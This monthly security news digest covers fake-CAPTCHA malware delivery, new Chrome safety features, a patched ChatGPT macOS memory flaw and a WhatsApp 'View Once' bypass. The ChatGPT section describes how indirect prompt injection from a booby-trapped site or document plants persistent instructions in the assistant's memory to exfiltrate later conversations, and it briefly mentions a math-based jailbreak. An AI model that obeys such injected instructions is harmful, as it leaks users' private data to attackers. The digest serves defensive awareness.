This month focuses on a campaign exploiting fake CAPTCHA to deliver Malware, New Google Chrome safety browser features, a recently patched vulnerability in OpenAIs macOS Software, and the WhatsApp ‘View Once’ vulnerability that allowed attackers to bypass the feature. 

New Campaign Exploiting CAPTCHA to Deliver Malware

Cybersecurity experts are warning about a new cyberattack vector involving counterfeit CAPTCHA tests designed to distribute malware on Windows devices.

Summary

• Traditional CAPTCHA tests are being subverted by cybercriminals to trick users into executing a series of commands that initiate malware installation.
• These fake CAPTCHAs prompt users to press “Windows + R” followed by “CTRL + V” and “Enter,” triggering a PowerShell script that installs the Lumma Stealer malware.
• Lumma Stealer is a type of information-stealing malware capable of exfiltrating sensitive data, including passwords, cookies, and cryptocurrency wallet credentials.
• Researchers have observed widespread distribution of these malicious CAPTCHAs on compromised websites, which can automatically copy the harmful script to a user’s clipboard.
• Cybercriminals are refining this technique, and these attacks are often deployed through phishing emails and messages, making them particularly dangerous.
• To mitigate this threat, users should be cautious with CAPTCHA tests that require unusual actions, verify URLs, keep systems updated, and avoid interacting with unsolicited emails or messages.
• Read more about the attack here.

Google rolls out new security features for its Chrome Browser

Google has introduced new features in Chrome to provide users with greater control over their data and enhance protection against online threats.

Summary

• The upgraded Safety Check now runs automatically in the background, revoking permissions for sites no longer visited and flagging potentially unwanted notifications.
• Safety Check will also alert users about security issues that need attention and automatically revoke notification permissions from suspicious sites detected by Google Safe Browsing.
• For desktop users, Safety Check can identify Chrome extensions that pose security risks and offer quick controls to remove them.
• Safety Check can warn users if their stored usernames or passwords have been involved in a data breach, prompting them to update their credentials.
• New updates also enable users to unsubscribe from unwanted website notifications directly from the notifications drawer on Pixel and Android devices.
• Chrome now allows users to grant one-time permissions for camera or microphone access, enhancing privacy by revoking these permissions once the user leaves the site.
• Read more about it here.

ChatGPT macOS app vulnerability patched to mitigate potential Spyware activity

A security vulnerability in OpenAI’s ChatGPT app for macOS, now patched, could have allowed attackers to implant persistent spyware in the tool’s memory, a technique termed “SpAIware.”

Summary

• The exploit leveraged ChatGPT’s memory feature, which allows the AI to remember information across sessions, enabling attackers to perform continuous data exfiltration of user inputs and ChatGPT responses.
• By manipulating ChatGPT’s memory through indirect prompt injections, attackers could embed malicious instructions that persist across all future chat sessions.
• A hypothetical attack could involve a user being tricked into visiting a malicious site or opening a booby-trapped document, which then modifies ChatGPT’s memory to send future conversation data to an attacker-controlled server.
• The issue was addressed by OpenAI in ChatGPT version 1.2024.247, closing the data exfiltration vector and preventing such attacks.
• Users are advised to regularly review and delete suspicious or incorrect memories stored in ChatGPT to prevent misuse or malicious persistence.
• Separately, researchers have discovered a new AI jailbreaking technique called “MathPrompt” that uses symbolic mathematics to bypass LLM safety mechanisms, showing a 73.6% success rate in generating harmful output compared to 1% with direct harmful prompts.
• Read more about it here

Meta fixes WhatsApp ‘View Once’ vulnerability.

A privacy flaw in WhatsApp’s “View once” feature allowed attackers to bypass restrictions and view messages multiple times, compromising users’ privacy.

Summary

• The “View once” feature, introduced three years ago, enables users to share photos, videos, and voice messages that disappear after being opened once and prevents forwarding, sharing, or taking screenshots.
• However, the feature only blocks screenshots on mobile devices; desktop and web versions do not support this restriction, making it vulnerable.
• A Research Team discovered that the implementation of the “View once” feature allowed attackers to bypass its protections by modifying the “View once” flag, enabling them to download, forward, and share the messages.
• The flaw persisted because the encrypted “View once” messages were sent to all of the recipient’s devices and stored on WhatsApp servers even after being viewed, leading to a false sense of privacy.
• Meta is currently rolling out changes to fix this issue on WhatsApp Web but has not confirmed if custom WhatsApp apps remain exploitable.
• The vulnerability has been abused for at least a year, with browser extensions released to disable the “View once” flag, leading researchers to call for a thorough fix or abandonment of the feature due to its false sense of privacy.
• Read more about the attack campaign here

Sources

• https://securityonline.info/cybercriminals-exploit-captcha-to-deliver-malware-experts-issue-warning/?&web_view=true
• https://thehackernews.com/2024/09/chrome-introduces-one-time-permissions.html
• https://thehackernews.com/2024/09/chatgpt-macos-flaw-couldve-enabled-long.html
• https://www.bleepingcomputer.com/news/security/meta-fixes-easily-bypassed-whatsapp-view-once-privacy-feature/
• https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma